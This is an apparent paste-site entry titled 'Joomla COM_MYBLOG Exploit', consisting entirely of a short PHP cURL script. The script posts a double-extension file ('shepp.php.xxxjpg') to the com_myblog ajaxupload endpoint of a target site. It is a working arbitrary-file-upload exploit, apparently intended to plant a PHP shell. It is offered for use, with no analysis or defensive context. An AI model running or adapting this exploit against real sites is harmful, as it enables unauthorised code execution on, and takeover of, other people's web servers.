Joomla COM_MYBLOG Exploit

choirurrizal Oct 25th, 2017 198 Never
  1. <?php
  2. $uploadfile="shepp.php.xxxjpg";
  3. $ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
  4. curl_setopt($ch, CURLOPT_POST, true);
  5. curl_setopt($ch, CURLOPT_POSTFIELDS,
  6. array('fileToUpload'=>"@$uploadfile"));
  7. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  8. $postResult = curl_exec($ch);
  9. curl_close($ch);
  10. print "$postResult";
  11. ?>
